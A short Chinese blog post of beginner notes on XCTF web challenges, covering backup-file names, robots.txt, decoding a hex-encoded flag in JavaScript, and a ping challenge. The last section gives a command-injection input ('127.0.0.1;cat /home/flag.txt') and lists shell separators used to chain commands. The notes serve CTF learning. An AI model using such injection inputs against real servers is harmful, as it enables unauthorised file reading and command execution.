攻防世界web新手随记

最新推荐文章于 2024-09-21 13:09:33 发布

weixin_30872157

最新推荐文章于 2024-09-21 13:09:33 发布

阅读量102

点赞数

文章标签： php

原文链接：http://www.cnblogs.com/Zhu013/p/11287884.html

版权

攻防世界web新手区随记：

index.php备份：

　　index.php→ index.php.bak
　　index.php→ index.old
　　index.php→ index.php.temp

robots协议：

　　限制搜索引擎范围

　　robots.txt

simple_js：

　　随便输入看到源码，
　　可知flag为

\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30
　　十六进制解码后为55,56,54,79,115,69,114,116,107,49,50
　　打开控制台，
　　把Js中的Pass内容换为以上数字
　　在函数末尾添加console.log(pass)
　　回车即可打印出flag

ping ctf

target=127.0.0.1;cat /home/flag.txt

截断符号有

'$'
';'
'|'
'-'
'('
')'
'反引号'
'||'
'&&'
'&'
'}'
'{'